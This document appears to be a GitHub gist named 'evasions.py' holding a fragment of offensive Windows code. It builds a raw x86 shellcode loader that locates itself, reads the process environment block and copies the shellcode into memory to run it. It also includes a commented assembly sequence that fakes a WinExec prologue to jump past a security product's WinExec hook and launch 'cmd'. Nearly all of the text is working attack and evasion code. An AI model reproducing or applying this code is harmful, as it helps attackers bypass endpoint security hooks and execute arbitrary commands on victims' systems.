/evasions.py
Created Apr 18, 2010
| offset = 0x1000 - len(scode) - 32 | |
| tls_header = "\xE8\x00\x00\x00\x00" # CALL $+5 | |
| tls_header += "\x5E" # POP ESI | |
| tls_header += "\x83\xC6\x1B" # ADD ESI, 0x1b | |
| tls_header += "\xB9" + struct.pack("<L", len(scode)) # MOV ECX, len(scode) | |
| tls_header += "\x64\x8B\x3D\x30\x00\x00\x00" # MOV EDI,DWORD PTR FS:[30] | |
| tls_header += "\x81\xC7" + struct.pack("<L", offset) # ADD EDI, offset | |
| tls_header += "\x57" # PUSH EDI | |
| tls_header += "\xFC" # CLD | |
| tls_header += "\xF3\xA4" # REP MOVSB [EDI], [ESI] | |
| tls_header += "\xC3" # RETN | |
| """ | |
| another: | |
| pop ebx ; Real return address | |
| push 0x00220000 ; Address of push ebp/call ebp after a call. | |
| push ebx ; Final return to the real return address | |
| push 0xbadc0de2 ; Junk to align stack for pop ebp | |
| push [ebp+0x4] ; Pointer to 'cmd\0' | |
| push 0x1010303D ; Address of pop ebp/ret(after a call) in CSAUSER | |
| push ebp ; WinExec preable | |
| mov ebp, esp | |
| sub esp, 0x54 ; end WinExec preable | |
| jmp eax ; jmp past WinExec hook. (eax = &WinExec + 0x6) | |
| """ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment